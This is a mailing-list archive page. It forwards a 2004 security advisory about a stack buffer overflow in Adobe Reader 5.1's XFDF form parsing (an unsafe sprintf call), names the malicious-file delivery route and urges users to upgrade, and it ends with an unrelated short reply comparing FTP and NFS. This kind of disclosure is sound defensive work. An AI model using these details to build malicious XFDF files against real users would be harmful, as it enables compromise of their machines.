[Please upgrade if you use Adobe Acrobat Reader -- Raju] This is an RFC 1153 digest. (1 message) -- MIME-Version: 1.0 Content-Type: text/plain; format=flowed; charset=iso-8859-1; reply-type=original Content-Transfer-Encoding: 7bit Message-ID: [EMAIL PROTECTED] From: NGSSoftware Insight Security Research [EMAIL PROTECTED] To: [EMAIL PROTECTED], [EMAIL PROTECTED], [EMAIL PROTECTED] Subject: Abobe Reader 5.1 XFDF Buffer Overflow Vulnerability Date: Wed, 3 Mar 2004 23:18:54 - NGSSoftware Insight Security Research Advisory Name: Adobe Acrobat Reader XML Forms Data Format Buffer Overflow Systems Affected: Adobe Acrobat Reader version 5.1 Severity: High Risk Vendor URL: http://www.adobe.com/ Author: David Litchfield [ [EMAIL PROTECTED] ] Date Vendor Notified:7th February 2004 Date of Public Advisory: 3rd March 2004 Advisory number: #NISR03022004 Advisory URL: http://www.ngssoftware.com/advisories/adobexfdf.txt Description *** Adobe Acrobat Reader is a viewer that renders PDF documents. The Reader can be extended using the XML Forms Data Format or XFDF. XFDF is a format for representing forms data and annotations in a PDF document. XFDF files have a .xfdf extention and are rendered automatically on downloaded when using applications such as Internet Explorer. Also note that, regardless of the file extention if the MIME type is set to application/vnd.adobe.xfdf the file will be treated as a XFDF. When parsing an XFDF document the Adobe Reader suffers from a classic stack based buffer overflow vulnerability. Details *** When the xfdf file is parsed an unsafe call to sprintf is made in preparation for outputting a debug message using OutputDebugString. Whether the process is being debugged or not the vulnerable code is still called. Rendering the file will tigger the overflow. A user would need to be enticed to a web site that hosted a malicious xfdf file or sent one via e-mail. Fix Information *** On contacting Adobe, they confirmed that the current version is no longer vulnerable and NGSSoftware urgently advises users of Adobe Reader to upgrade. http://www.adobe.com/support/downloads/main.html About NGSSoftware * NGSSoftware design, research and develop intelligent, advanced application security assessment scanners. Based in the United Kingdom, NGSSoftware have offices in the South of London and the East Coast of Scotland. NGSSoftware's sister company NGSConsulting, offers best of breed security consulting services, specialising in application, host and network security assessments. http://www.ngssoftware.com/ Telephone +44 208 401 0070 Fax +44 208 401 0076 [EMAIL PROTECTED] -- End of this Digest ** -- Raj Mathur[EMAIL PROTECTED] http://kandalaya.org/ GPG: 78D4 FC67 367F 40E2 0DD5 0FEF C968 D0EF CC68 D17F It is the mind that moves ___ ilugd mailinglist -- [EMAIL PROTECTED] http://frodo.hserus.net/mailman/listinfo/ilugd Archives at: http://news.gmane.org/gmane.user-groups.linux.delhi http://www.mail-archive.com/[EMAIL PROTECTED]/
[ilugd] RE: [LIH]Fastest method of installation
:: -Original Message- :: From: Yashpal Nagar :: criteria for choosing best interms of fast data transfer / :: reliability easyiness or lesser work to perform ,over the :: network of (10 Mb/s) FTP will probably be the fastest considering just the protocol, but you might find NFS the best choice given your requirements constraints. -- Ravi ___ ilugd mailinglist -- [EMAIL PROTECTED] http://frodo.hserus.net/mailman/listinfo/ilugd Archives at: http://news.gmane.org/gmane.user-groups.linux.delhi http://www.mail-archive.com/[EMAIL PROTECTED]/